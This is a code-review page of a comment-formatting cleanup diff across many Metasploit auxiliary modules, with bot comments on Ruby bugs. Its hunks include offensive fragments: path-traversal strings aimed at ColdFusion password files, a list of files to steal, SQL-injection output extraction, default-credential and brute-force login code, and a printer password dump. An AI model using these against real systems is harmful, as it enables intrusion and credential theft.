@ -829,7 +829,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
|
||||
# via the FILE_URLS module option.
|
||||
# via the FILE_URLS module option.
|
||||
def interesting_file_urls
|
||||
[
|
||||
'file:///var/log/weekly.out', # may contain usernames
|
||||
@ -849,7 +849,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
(datastore['URLS'] || '').split(/\s+/)
|
||||
end
|
||||
|
||||
# @param [String] input the unencoded string
|
||||
# @param input [String] the unencoded string
|
||||
# @return [String] input with dangerous chars replaced with xml entities
|
||||
def escape_xml(input)
|
||||
input.to_s.gsub("&", "&").gsub("<", "<")
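Review bot: `script['content-length'] = script[:body].length` in `web_response_xml` (the `@ -320,14` hunk) uses the character count of the body, which differs from the byte count for any non-ASCII content; a Content-Length header must be the byte length, so this should be `script[:body].bytesize` (assuming `:body` is a String — confirm against the caller). The same line mixes a string key `'content-length'` with a symbol key `:body` on one hash, which deserves a comment if it is intentional. In the last hunk, `escape_xml` covers only `&` and `<` (as rendered here the replacement strings even look identical to the originals, presumably a page artifact); `input.to_s.encode(xml: :text)` from the standard library also escapes `>` and is harder to get wrong. `web_response_xml` ends outside its hunk.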
|
||||
|
@ -158,14 +158,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
filename = ""
|
||||
|
||||
url = '/CFIDE/administrator/index.cfm'
|
||||
# print_status("Getting index...")
|
||||
# print_status("Getting index...")
|
||||
res = send_request_cgi({
|
||||
'uri' => url,
|
||||
'method' => 'GET',
|
||||
'Connection' => "keep-alive",
|
||||
'Accept-Encoding' => "zip,deflate",
|
||||
})
|
||||
# print_status("Got back: #{res.inspect}")
|
||||
# print_status("Got back: #{res.inspect}")
|
||||
return if not res
|
||||
return if not res.body or not res.code
|
||||
return if not res.code.to_i == 200
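Review bot: In the `send_request_cgi` call, `'Connection'` and `'Accept-Encoding'` are passed as top-level option keys rather than under `'headers'`; if the HTTP client only recognises its own option names, both are silently ignored, and `zip` is not a registered HTTP content-coding in any case (`gzip` is). Moving them to `'headers' => { 'Connection' => 'keep-alive', 'Accept-Encoding' => 'gzip,deflate' }` makes the intent explicit and testable. The three guards at the end read more clearly as `return unless res && res.body && res.code.to_i == 200`, which also stops relying on `not` binding looser than `==`. The enclosing method starts and ends outside this hunk.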
|
||||
|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def srvqry(dom)
|
||||
results = []
|
||||
#Most common SRV Records
|
||||
# Most common SRV Records
|
||||
srvrcd = [
|
||||
'_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
|
||||
'_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
|
||||
|
@ -51,7 +51,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
def switchdns(target)
|
||||
if not datastore['NS'].nil?
|
||||
print_status("Using DNS Server: #{datastore['NS']}")
|
||||
@ -71,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def wildcard(target)
|
||||
rendsub = rand(10000).to_s
|
||||
query = @res.query("#{rendsub}.#{target}", "A")
|
||||
@ -85,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def genrcd(target)
|
||||
print_status("Retrieving general DNS records")
|
||||
query = @res.search(target)
|
||||
@ -167,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def tldexpnd(targetdom,nssrv)
|
||||
target = targetdom.scan(/(\S*)[.]\w*\z/).join
|
||||
target.chomp!
|
||||
@ -178,13 +177,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
i, a = 0, []
|
||||
tlds = [
|
||||
"com", "org", "net", "edu", "mil", "gov", "uk", "af", "al", "dz",
|
||||
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac","au",
|
||||
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac", "au",
|
||||
"at", "az", "bs", "bh", "bd", "bb", "by", "be", "bz", "bj", "bm",
|
||||
"bt", "bo", "ba", "bw", "bv", "br", "io", "bn", "bg", "bf", "bi",
|
||||
"kh", "cm", "ca", "cv", "ky", "cf", "td", "cl", "cn", "cx", "cc",
|
||||
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
|
||||
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
|
||||
"dk", "dj", "dm", "do", "tp", "ec", "eg", "sv", "gq", "er", "ee",
|
||||
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
|
||||
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
|
||||
"ge", "de", "gh", "gi", "gr", "gl", "gd", "gp", "gu", "gt", "gg",
|
||||
"gn", "gw", "gy", "ht", "hm", "va", "hn", "hk", "hu", "is", "in",
|
||||
"id", "ir", "iq", "ie", "im", "il", "it", "jm", "jp", "je", "jo",
|
||||
@ -221,7 +220,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def dnsbrute(target, wordlist, nssrv)
|
||||
print_status("Running bruteforce against domain #{target}")
|
||||
arr = []
|
||||
@ -250,7 +248,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def bruteipv6(target, wordlist, nssrv)
|
||||
print_status("Bruteforcing IPv6 addresses against domain #{target}")
|
||||
arr = []
|
||||
@ -283,7 +280,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def reverselkp(iprange,nssrv)
|
||||
print_status("Running reverse lookup against IP range #{iprange}")
|
||||
if not nssrv.nil?
|
||||
@ -327,12 +323,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
tl.delete_if { |t| not t.alive? }
|
||||
end
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
#SRV Record Enumeration
|
||||
|
||||
# SRV Record Enumeration
|
||||
def srvqry(dom,nssrv)
|
||||
print_status("Enumerating SRV records for #{dom}")
|
||||
i, a = 0, []
|
||||
#Most common SRV Records
|
||||
# Most common SRV Records
|
||||
srvrcd = [
|
||||
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp","_test._tcp.",
|
||||
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
|
||||
@ -354,8 +350,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
#For Performing Zone Transfers
|
||||
# For Performing Zone Transfers
|
||||
def axfr(target, nssrv)
|
||||
print_status("Performing zone transfer against all nameservers in #{target}")
|
||||
if not nssrv.nil?
|
||||
@ -387,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'dns.enum',
|
||||
:update => :unique_data,
|
||||
:data => "Zone transfer successful")
|
||||
#Prints each record according to its type
|
||||
# Prints each record according to its type
|
||||
zone.each do |response|
|
||||
response.answer.each do |rr|
|
||||
begin
|
||||
@ -475,7 +470,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:data => "#{rr.host},#{rr.port},#{rr.priority},SRV")
|
||||
end
|
||||
rescue ActiveRecord::RecordInvalid
|
||||
#Do nothing. Probably tried to store :host => 127.0.0.1
|
||||
# Do nothing. Probably tried to store :host => 127.0.0.1
|
||||
end
|
||||
end
|
||||
end
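Review bot: In `srvqry`'s record list (the `@ -327,12` hunk), `"_ldap._tcp"` is the only entry without a trailing dot, so the name presumably built from it differs from its siblings (the other module's list earlier on this page has `'_ldap._tcp.'`), and `"_aix._tcp."` appears twice on the next line, costing a duplicate query per domain. The first line should be `"_gc._tcp.", "_kerberos._tcp.", "_kerberos._udp.", "_ldap._tcp.", "_test._tcp.",` with the second `"_aix._tcp."` dropped; the commit normalises `"ac","au"` to `"ac", "au"` in `tldexpnd` but leaves this list unspaced. The `rescue ActiveRecord::RecordInvalid` in the last hunk is commented as deliberate, which is good; a `vprint_status` naming the skipped record would make the silence diagnosable. `srvqry` ends outside its hunk.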
|
||||
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
|
||||
'joev' # msf module
|
||||
'joev' # metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -84,10 +84,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||
fail_with("Error in server response")
|
||||
end
|
||||
|
||||
#qgjuq is prepended to the result of the sql injection
|
||||
#qirpq is appended to the result of the sql injection
|
||||
#This allows the use of a simple regex to grab the contents
|
||||
#of the file easily from the page source.
|
||||
# qgjuq is prepended to the result of the sql injection
|
||||
# qirpq is appended to the result of the sql injection
|
||||
# This allows the use of a simple regex to grab the contents
|
||||
# of the file easily from the page source.
|
||||
file = /qgjuq(.*)qirpq/.match(resp.body)
|
||||
|
||||
file = file[0].gsub('qgjuq', '').gsub('qirpq', '')
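Review bot: `file = /qgjuq(.*)qirpq/.match(resp.body)` returns nil when the markers are absent, so the following `file[0]` raises `NoMethodError` instead of taking the `fail_with` path used for the earlier response check. The capture group already isolates the content, making both `gsub` calls redundant: `match = /qgjuq(.*)qirpq/.match(resp.body)`, `fail_with("Error in server response") unless match`, `file = match[1]`. If the retrieved content can span lines, `.` will not cross them without the `/m` flag — confirm against what the module expects to read. The enclosing method starts and ends outside this hunk.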
|
||||
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
#Check PhP
|
||||
# Check PhP
|
||||
php_version = res['X-Powered-By']
|
||||
if php_version
|
||||
php_version = "#{php_version}"
|
||||
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
php_version = "PHP version unknown"
|
||||
end
|
||||
|
||||
#Check Web-Server
|
||||
# Check Web-Server
|
||||
web_server = res['Server']
|
||||
if web_server
|
||||
web_server = "#{web_server}"
|
||||
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
web_server = "unknown web server"
|
||||
end
|
||||
|
||||
#Check forum MyBB
|
||||
# Check forum MyBB
|
||||
if res.body.match("MYBB")
|
||||
print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}")
|
||||
return Exploit::CheckCode::Detected
|
||||
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Resolve response
|
||||
# Resolve response
|
||||
if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
|
||||
print_good("#{peer} - Running PostgreSQL Database")
|
||||
elsif response.body.match(/General error\: 1 no such function\: REGEXP/)
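Review bot: `php_version = "#{php_version}"` and `web_server = "#{web_server}"` are no-ops when the header values are already strings; if a non-string header object must be coerced, `.to_s` says so directly, otherwise both lines can go. `res.body.match("MYBB")` compiles the string into a regex on every call where `res.body.include?("MYBB")` is the plain substring test the condition needs (case-sensitive either way — confirm that is intended for a marker that may also appear as `MyBB`). The enclosing method, presumably `check` given the `CheckCode` returns, starts and ends outside these hunks.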
|
||||
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
end
|
||||
|
||||
#Search google.com for email's of target domain
|
||||
# Search google.com for email's of target domain
|
||||
def search_google(targetdom)
|
||||
print_status("Searching Google for email addresses from #{targetdom}")
|
||||
response = ""
|
||||
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return emails.uniq
|
||||
end
|
||||
|
||||
#Search Yahoo.com for email's of target domain
|
||||
# Search Yahoo.com for email's of target domain
|
||||
def search_yahoo(targetdom)
|
||||
print_status("Searching Yahoo for email addresses from #{targetdom}")
|
||||
response = ""
|
||||
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return emails.uniq
|
||||
end
|
||||
|
||||
#Search Bing.com for email's of target domain
|
||||
# Search Bing.com for email's of target domain
|
||||
def search_bing(targetdom)
|
||||
print_status("Searching Bing email addresses from #{targetdom}")
|
||||
response = ""
|
||||
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return emails.uniq
|
||||
end
|
||||
|
||||
#for writing file with all email's found
|
||||
# for writing file with all email's found
|
||||
def write_output(data)
|
||||
print_status("Writing email address list to #{datastore['OUTFILE']}...")
|
||||
::File.open(datastore['OUTFILE'], "ab") do |fd|
|
||||
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#Trigger firmware bootstrap write out password data to URL root
|
||||
# Trigger firmware bootstrap write out password data to URL root
|
||||
def write
|
||||
print_status("#{rhost}:#{jport} - Sending print job")
|
||||
create_print_job = '%%XRXbegin' + "\x0a"
|
||||
|
@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
|
||||
|
||||
],
|
||||
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
|
||||
|
@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
|
||||
],
|
||||
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE
|
||||
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sock.put(trojan_command(:nop))
|
||||
|
||||
print_status("#{ip}:#{rport} FOUND: #{files.inspect}")
|
||||
## Add Vulnerability and Report
|
||||
# Add Vulnerability and Report
|
||||
report_vuln({
|
||||
:host => ip,
|
||||
:name => "Energizer DUO USB Battery Charger Software Arucer.dll Trojaned Distribution",
|
||||
|
@ -31,9 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
|
||||
connect_udp
|
||||
|
||||
udp_sock.put(pkt)
|
||||
|
||||
res = udp_sock.read(1024).split(/\x00/)
|
||||
|
||||
if (res)
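Review bot: `res = udp_sock.read(1024).split(/\x00/)` raises `NoMethodError` if `read` returns nil on a timeout or empty reply, and because `split` always returns an Array the `if (res)` guard on the next line is always true, so it no longer protects anything. `res = udp_sock.read(1024).to_s.split(/\x00/)` together with `unless res.empty?` restores the intended check; whether `read` can return nil here depends on the socket mixin, so confirm. The `begin` block and the enclosing method continue outside this hunk.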
|
||||
|
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#reportdata << "name: #{princ.unpack("H*")[0]}"
|
||||
end
|
||||
|
||||
## Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'tcp',
|
||||
|
@ -149,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
# Start caputure
|
||||
# Start capture
|
||||
open_pcap({'FILTER' => "icmp6"})
|
||||
|
||||
@netifaces = true
|
||||
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'xistence' #Vulnerability discovery and Metasploit module
|
||||
'xistence' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => "Jan 28 2014"
|
||||
|
@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
end
|
||||
|
||||
#URL's that may work for you:
|
||||
# URLs that may work for you:
|
||||
#"/CFIDE/administrator/enter.cfm",
|
||||
#"/CFIDE/wizards/common/_logintowizard.cfm",
|
||||
#"/CFIDE/administrator/archives/index.cfm",
|
||||
@ -206,7 +206,7 @@ end
|
||||
#"/CFIDE/administrator/entman/index.cfm",
|
||||
#"/CFIDE/administrator/logging/settings.cfm",
|
||||
|
||||
#Files to grab
|
||||
# Files to grab
|
||||
#../../../../../../../../../../ColdFusion8/lib/password.properties%00en
|
||||
#../../../../../../../../../../CFusionMX7/lib/password.properties%00en
|
||||
#../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en
|
||||
|
@ -105,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
# print table
|
||||
print_line(membertbl.to_s)
|
||||
|
||||
#store username to loot
|
||||
# store username to loot
|
||||
report_note({
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
|
@ -25,8 +25,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'hdm', #http_login module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
|
||||
'hdm', # http_login module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
|
||||
],
|
||||
'References' =>
|
||||
[
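Review bot: The new side of this hunk leaves `'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included` without the space after `#` that the same hunk adds to the `hdm` line, so the author list ends up half-converted; it should read `'Michael Messner <devnull[at]s3cur1ty.de>' # dlink login included`. The same residue is visible in later hunks of this commit: the second `hdm`/`Michael Messner` author list, `'blkhtc0rp', #Original`, the `#Failed Password` and `#Invalid User` trailing comments in the response analysis, `#messageLength` after the `packet.insert` call, and the `#numberToSkip`/`#numberToReturn` lines in `get_nonce`. Since the commit's whole purpose is this normalisation, a pass with a leading-comment-space lint would catch the leftovers.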
|
||||
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}
|
||||
end
|
||||
|
||||
#default to user=admin without password (default on most dlink routers)
|
||||
# default to user=admin without password (default on most dlink routers)
|
||||
def do_login(user='admin', pass='')
|
||||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
|
||||
|
@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
devices. It is possible that this module also works with other models.
|
||||
},
|
||||
'Author' => [
|
||||
'hdm', #http_login module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
|
||||
'hdm', #http_login module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def is_dlink?
|
||||
#the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting
|
||||
#input to detect this device. Not sure if this works on other devices! Tested on v8.04.
|
||||
# the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting
|
||||
# input to detect this device. Not sure if this works on other devices! Tested on v8.04.
|
||||
begin
|
||||
response = send_request_cgi({
|
||||
'uri' => '/gconfig.htm',
|
||||
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false if response.nil?
|
||||
return false if (response.code == 404)
|
||||
|
||||
#fingerprinting tested on firmware version 8.04
|
||||
# fingerprinting tested on firmware version 8.04
|
||||
if response.body !~ /var\ systemName\=\'DLINK\-DIR615/
|
||||
return false
|
||||
else
|
||||
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#default to user=admin without password (default on most dlink routers)
|
||||
# default to user=admin without password (default on most dlink routers)
|
||||
def do_login(user='admin', pass='')
|
||||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
|
||||
|
@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}
|
||||
end
|
||||
|
||||
#default to user=admin without password (default on most dlink routers)
|
||||
# default to user=admin without password (default on most dlink routers)
|
||||
def do_login(user='admin', pass='')
|
||||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
|
||||
|
@ -37,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
])
|
||||
], self.class)
|
||||
|
||||
# "Set to false to prevent account lockouts - it will!"
|
||||
# Set to false to prevent account lockouts - it will!
|
||||
deregister_options('BLANK_PASSWORDS')
|
||||
end
|
||||
|
||||
def target_url
|
||||
#Function to display correct protocol and host/vhost info
|
||||
# Function to display correct protocol and host/vhost info
|
||||
if rport == 443 or ssl
|
||||
proto = "https"
|
||||
else
|
||||
@ -74,8 +74,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Check for HTTP 200 response.
|
||||
#Numerous versions and configs make if difficult to further fingerprint.
|
||||
# Check for HTTP 200 response.
|
||||
# Numerous versions and configs make if difficult to further fingerprint.
|
||||
if (res and res.code == 200)
|
||||
print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")
|
||||
|
||||
@ -110,8 +110,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def get_version
|
||||
#Attempt to retrieve the version of CMS400.NET installed.
|
||||
#Not always possible based on version/config.
|
||||
# Attempt to retrieve the version of CMS400.NET installed.
|
||||
# Not always possible based on version/config.
|
||||
payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"
|
||||
res = send_request_cgi(
|
||||
{
|
||||
|
@ -158,7 +158,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
#blah
|
||||
end
|
||||
else
|
||||
if res.code.to_i == 400 and ecode != 400
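Review bot: `print_status("NOT Found … #{res.code.to_i}")` is reached when `not res` is true, because the enclosing condition is `not res or (…)`, so a nil response raises NoMethodError on `res.code` instead of being reported as not found. The interpolation needs its own nil check, e.g. `#{res ? res.code.to_i : 'no response'}`. The later hunk with the identical `NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}` line has the same problem. The method containing this code starts and ends outside the hunk.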
|
||||
|
@ -128,17 +128,17 @@ class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
case action.name
|
||||
when 'PUT'
|
||||
#Append filename if there isn't one
|
||||
# Append filename if there isn't one
|
||||
if path !~ /(.+\.\w+)$/
|
||||
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
|
||||
vprint_status("No filename specified. Using: #{path}")
|
||||
end
|
||||
|
||||
#Upload file
|
||||
# Upload file
|
||||
res = do_put(path, data)
|
||||
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
|
||||
|
||||
#Check file
|
||||
# Check file
|
||||
if not res.nil? and file_exists(path, data)
|
||||
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
|
||||
print_good("File uploaded: #{turl}")
|
||||
@ -156,7 +156,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
when 'DELETE'
|
||||
#Check file before deleting
|
||||
# Check file before deleting
|
||||
if path !~ /(.+\.\w+)$/
|
||||
print_error("You must supply a filename")
|
||||
return
|
||||
@ -165,11 +165,11 @@ class Metasploit4 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Delete our file
|
||||
# Delete our file
|
||||
res = do_delete(path)
|
||||
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
|
||||
|
||||
#Check if DELETE was successful
|
||||
# Check if DELETE was successful
|
||||
if res.nil? or file_exists(path, data)
|
||||
print_error("DELETE failed. File is still there.")
|
||||
else
|
||||
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}
|
||||
})
|
||||
|
||||
#without res.body.length we get lots of false positives
|
||||
# without res.body.length we get lots of false positives
|
||||
if (res and res.code == 200 and res.body.length > 0)
|
||||
print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
|
||||
report_web_vuln({
|
||||
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
|
||||
|
||||
#test login
|
||||
# test login
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>', # Discovery and exploit
|
||||
'Brendan Coles <bcoles[at]gmail.com>' # msf
|
||||
'Brendan Coles <bcoles[at]gmail.com>' # metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'blkhtc0rp', #Original
|
||||
'sinn3r'
|
||||
'blkhtc0rp', #Original
|
||||
'sinn3r' #Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => "Oct 19 2012"
|
||||
|
@ -34,9 +34,9 @@ class Metasploit4 < Msf::Auxiliary
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Daniel Franke', # Vulnerability discovery and PoC
|
||||
'juan vazquez', # Metasploit module
|
||||
'Christian Mehlmauer' # Metasploit module
|
||||
'Daniel Franke', # Vulnerability discovery and PoC
|
||||
'juan vazquez', # Metasploit module
|
||||
'Christian Mehlmauer' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
#load the file with filenames into memory
|
||||
# load the file with filenames into memory
|
||||
queue = []
|
||||
File.open(datastore['FILEPATH'], 'rb').each_line do |fn|
|
||||
queue << fn.strip
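Review bot: `File.open(datastore['FILEPATH'], 'rb').each_line` never closes the file, because the non-block form of `File.open` returns a handle that is only released when the object is garbage-collected. Use the block form so the descriptor is released when the loop finishes: `File.open(datastore['FILEPATH'], 'rb') { |f| f.each_line { |fn| queue << fn.strip } }`, assuming the loop body is just the `queue <<` line; otherwise wrap the existing `do … end` inside the `File.open` block. The loop and the method that contains it continue past the end of the hunk.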
|
||||
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return save_array
|
||||
end
|
||||
|
||||
#traversal every file
|
||||
# traverse every file
|
||||
def find_files(file,user,pass)
|
||||
traversal = '/../../'
|
||||
|
||||
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
|
||||
|
||||
#test login
|
||||
# test login
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
|
@ -186,8 +186,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return :abort
|
||||
end
|
||||
if action.name == "OWA_2013"
|
||||
#Check for a response code to make sure login was valid. Changes from 2010 to 2013.
|
||||
#Check if the password needs to be changed.
|
||||
# Check for a response code to make sure login was valid. Changes from 2010 to 2013.
|
||||
# Check if the password needs to be changed.
|
||||
if res.headers['location'] =~ /expiredpassword/
|
||||
print_good("#{msg} SUCCESSFUL LOGIN. '#{user}' : '#{pass}': NOTE password change required")
|
||||
report_hash = {
|
||||
@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return :next_user
|
||||
end
|
||||
|
||||
#No password change required moving on.
|
||||
# No password change required moving on.
|
||||
unless location = res.headers['location']
|
||||
print_error("#{msg} No HTTP redirect. This is not OWA 2013, aborting.")
|
||||
return :abort
|
||||
@ -212,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if reason == nil
|
||||
headers['Cookie'] = 'PBack=0;' << res.get_cookies
|
||||
else
|
||||
#Login didn't work. no point on going on.
|
||||
# Login didn't work. no point on going on.
|
||||
vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}' (HTTP redirect with reason #{reason})")
|
||||
return :Skip_pass
|
||||
end
|
||||
|
@ -18,8 +18,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
an arbitrary object instantiation flaw in the XML request processor.
|
||||
},
|
||||
'Author' => [
|
||||
'hdm', #author
|
||||
'jjarmoc' #improvements
|
||||
'hdm', # author
|
||||
'jjarmoc' # improvements
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -146,7 +146,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
